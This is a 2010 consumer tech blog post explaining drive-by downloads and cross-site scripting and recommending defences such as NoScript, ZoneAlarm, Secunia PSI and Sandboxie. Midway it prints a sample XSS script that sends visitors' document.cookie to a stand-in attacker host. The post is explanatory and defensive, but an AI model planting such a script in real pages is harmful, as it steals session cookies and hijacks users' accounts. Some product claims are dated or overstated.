Scoroncocolo TechPages

 only search Scoroncocolo

Windows Hacks and Facts

Cool Software.

XP and Vista tips and tweaks and lots of other geeky things for computer users

May 16, 2010

Bookmark and Share

Firefox Add-on NoScript

Drive-by Downloads


Scoroncocolo, Scoroncocolo Tech Pages, ScarewareProtect yourself from Drive-by Downloads with Firefox's add-on, NoScript.

Very recently I posted a page on Scareware, an increasingly prevalent and perverse method of infecting computers with malware (viruses, trojans rootkits, keyloggers and other pernicious junk). Unlike that scenario where someone might be tempted to download and install on their computer something that looks to be a legitimate anti-spyware program but instead turns out to contain a whole host of malware that it misleadingly proposed to help the user guard against, a Drive-by download occurs without much if any interaction on the user's part at all. You can become a victim of a Drive-by download just by visiting a purposely infested website or a perfectly innocent website that cyber criminals have managed to sabotage. And you don't necessarily have to slum around in the sleazy neighborhoods of the Web to become a victim of a Drive-by download although doing so would very much increase your chances of becoming a victim. On April 15, 2010, researchers at ALWIL Software, providers of Avast Anti-virus software publicly announced that they had used automated feed-back from their users to estimate that there are approximately 252,800 domains (websites) world-wide infected with malware. That amounts to 2,150,000 infected web pages world wide. ALWIL did not provide any numbers on infected sites registered in the US. But for British-based websites alone, the list included over 3,000 infected domains. Many of the infected sites were small businesses or travel sites such as harrysbars.co.uk and westminster-london-hotels.co.uk. The point being that these infested sites are not the type of website that one would ordinarily be suspicious of.

So why would Harry's Bar decide to expose visitors to it's website to viruses, trojans, rootkits and other malicious spyware? The chances are near 100% that "Harry" had no idea that his site was compromised. If a website hosts ads or widgets or hosts forums or has comments sections on their pages, that site is susceptible to outside injection of a procedure known as Cross-site Scripting usually abbreviated as (XSS). Unfortunately, Cross-site Scripting is becoming increasingly wide-spread because it's not that difficult to do. In the simplest terms, XSS is the injection of malicious JavaScript into a legitimate Web page, where it can then be executed in the browsers of innocent visitors to that page. A Web site is susceptible to Cross-site Scripting if it allows users to upload content to be shared with other visitors to the website. A website owner who allows this type of content must constantly 1nspect that content to remove any potentially harmful scripting code. The classic example of this sort of vulnerability is content management software such as forums and bulletin boards where users are allowed to use raw HTML to format their posts.

Many websites host bulletin boards, chat rooms, message boards or now more commonly comments to individual blog posts where registered users may post messages which are stored in a database of some kind. A registered user is commonly tracked using a session ID cookie authorizing them to post. If an attacker were to post a message containing a specially crafted JavaScript, a user reading this message could have their cookies and their account compromised.

 

<SCRIPT>
document.location= 'http://attackerhost.example/cgi-
bin/cookiesteal.cgi?'+document.cookie

</SCRIPT>

 

Although the above snippet of code is designed to steal browser session cookies, it could easily be altered to re-direct an unsuspecting user to an infested website controlled by the cyber-crook who sabotaged the message board or comment section of the legitimate website. The page the user could be redirected to could look innocuous enough but it could in fact be an attack page. A typical attack page contains a barrage of script (usually JavaScript) exploits targeting a variety of weaknesses in different versions of the browser, operating system, and other programs. If any security breaches are found the user's computer could very quickly fall victim to a drive-by download that could include rootkits, keyloggers, viruses and all sorts of other vile malware.

How to Combat Drive-by Downloads


Listed below are a number of things you can do to lessen your chances of becoming the victim of a drive-by download.

First and most importantly, to avoid cross-site scripting exploits, never click on links in the area of webpages where people other than the sites owner have posted content. And of course we all know not to open email attachments from suspicious sources or click on links in email messages that we aren't absolutely certain come from people or businesses we know and trust.

Use a good third-party firewall like ZoneAlarm that helps to protect you from outside and inside. Windows XP and Vista's built-in Firewall are essentially useless because they don't protect you from programs that might have wormed their way in and onto your computer and are now attempting to "dial home" and Windows 7 firewall is not much better. A smarter, safer option is for you to download and install ZoneAlarm. Once ZoneAlarm is up and running it will automatically turn off Windows' Firewall which is good because you never want to run more than one firewall at a time.

Always make sure you are using the latest non-beta version of whichever browser you choose to use. Firefox, Google's Chrome, Opera and Apple's Safari will be safer than Microsoft's Internet Explorer because even though the other browsers are all gaining market share on IE, Internet Explorer is still the most used browser of all because it comes pre-installed on all versions of Windows. For this reason and due to the fact that IE users tend to be less tech savvy than users of other browsers, the bad guys devote more of their time, energy and resources searching for security flaws in Internet Explorer than any other browser. If you must use use IE, use IE 8 not IE 7 and certainly not internet Explorer 6. You don't need to do anything special to keep IE 8 patched other than to make sure you have your computer set to automatically download and install Windows Updates. Microsoft releases security patches on Patch Tuesday which is the second Tuesday of every month. But you can be sure that every Wednesday morning after Patch Tuesday the bad guys are up bright and early looking for ways to circumvent the patches and/or find new holes in the browser through which to attack innocent users. So never assume that any browser and especially Internet Explorer is invulnerable. To make sure you are using the latest version of Firefox and most other non-microsoft browsers, when the browser is open to any webpage, click Help on the top left of the page and in the drop-down menu click Check for Updates. To find out what version of browser you are using in most all browsers, click Help then About....

Use Firefox's plug-in checker to keep your browser add-ons and plug-ins up to date. See Computer World's page on the new Firefox plug-in published on the 12th of this month. Firefox has fashioned its plug-in checker so that it works in browsers other than its own. It will check for updates to important plug-ins like Adobe's Flash in the Google Chrome browser, Opera, Safari and even Internet Explorer 7 and 8.

Seriously consider using a browser other than Internet Explorer. Microsoft has recently admitted that there is a design flaw in all of its browsers, even IE 8, that could allow cyber-criminals to "read" every file on your hard drive!

O.K. so you are behind a truly decent firewall and you're using the latest version of Firefox which is as of the time I'm writing this version 3.6.3 or some other up-to-date browser. But there are other things to consider. How often do you open (read) PDF files online? How often do you download PDF files? Do you use Adobe Reader for these purposes? I don't but most people do. Do you use Adobe Flash Player to watch videos? Adobe is the provider of a lot of software we use in conjunction with our browsers and therefore the vulnerabilities in its products are conduits through which cyber-criminals can attack us. Adobe does a poor job of closing security holes in its products according to Apple's CEO Steve Jobs but it does offer patches from time to time although it doesn't offer any intuitive manner of notifying its users when up-dates are available. This is where Secunia Personal Software Inspector comes to the rescue. Secunia PSI works in the background and monitors the update pages of all of the software installed on your computer. Once it finds that an update is available it alerts you. It then offers to direct you to the location on the Web where the update is available. Back on January 8, 2009 I posted a long article on using Secunia and radarsync to update your computer that you might want to have a look at.

On October 19, 2009 I posted a piece on this blog explaining that the safest way to browse the Internet is to do so inside a Sandbox and I recommended what I still believe is the best free software for doing that which is Sandboxie. While using Sandboxie to browse the Internet is the surest way to stay safe from any sort of malware, it is only effective if you use it every time you go online. And well... I don't and you probably won't either. It's not a set it and forget it thing.

But what I'm using now to protect myself while browsing the Web is a set it and forget it thing. It's a Firefox add-on called NoScript.

Firefox Add-on NoScript


The object of NoScript is elegantly simple. It allows no scripts to run in your browser without your permission. And not just JavaScript. NoScript blocks Java™ (Java and JavaScript are two completely different scripting languages), Microsoft's Silverlight™, Flash®, and other plugins and embeddings such as HTML video/audio elements and downloadable fonts. It will block Java Applets, Flash movies, Quicktime clips and PDF documents. It blocks code written in Perl and Ruby and Ruby-on-Rails. In short, NoScript blocks all scripts from running in your browser without your permission, period. Although JavaScript has been the weapon of choice used most by cyber-criminals in the past, more frequently now the bad guys are targeting other scripting methods. That is why the Firefox add-on NoScript protects against all scripts running in your browser.

Of course there will be times that you will want scripts to run on websites and pages that you trust. Scripts are ubiquitous on the web. Ninety percent of modern webpages would not render correctly without scripting languages. I use a small amount of JavaScript on the page you're reading right now to make rounded corners, for instance. That's why NoScript allows you to selectively allow scripts to run on whole websites or on particular pages within websites that you trust.

NoScript is a cinch to use. Once you have NoScript installed on your copy of Firefox, you only need to click on a tiny icon on the bottom right corner of your browser window to tell NoScript how you want it to deal with a particular website or webpage. NoScript will remember your settings for that site or page until you instruct it to be treated differently. So NoScript doesn't slow down your browsing after it "learns" which sites you trust. If anything it speeds up your browsing because you can instruct NoScript to "partially allow scripts" on any page which will render the page perfectly without loading a lot of ads which makes the page load faster.

NoScript is not the silver bullet in the fight against the malware Mafia but it is one more very effective weapon in our arsenal. In my opinion you would be wise to use it. Here's where you can read more about and download the Firefox add-on NoScript.



Thanks For Visiting the Tech Pages

Vague and Nebulous Computer Tips and TricksQuestions? Comments? Did I get something wrong? Email me at sjh@scoroncocolo.com and I WILL get back to you.

Please add this page, or better yet my entire site, to your Favorites and keep checking back. This page is a work in progress. long tail seoI intend to edit it and add to it from time to time. In the meantime, if you have any ideas about how I could enhance the content of this page, please email me about it.

If you see anything in this post that needs to be corrected, email me about that, as well. I'll make the changes and make sure you get credit for spotting my mistakes. If you have any questions or comments about anything in this post or any other posts on the Tech Pages, email me at sjh@scoroncocolo.com and I will get back to you.

Don't forget to visit my Home Page at Scoroncocolo.com . And if that's how you got here in the first place, hit your Back button and look around. You can read my other Tech Pages posts by going to my home page and looking for them there. You can also look on the left side of this page and click on any of my Previous Posts.

To make this page and all of the other of my Tech Pages easy to find, type Ctrl + d to bookmark me and come back once a week or so and see what's new.

Join me on Google Wave.

About - Services - Portfolio - Contact Us - Home Page

Copyright © Scoroncocolo 2008 - 2010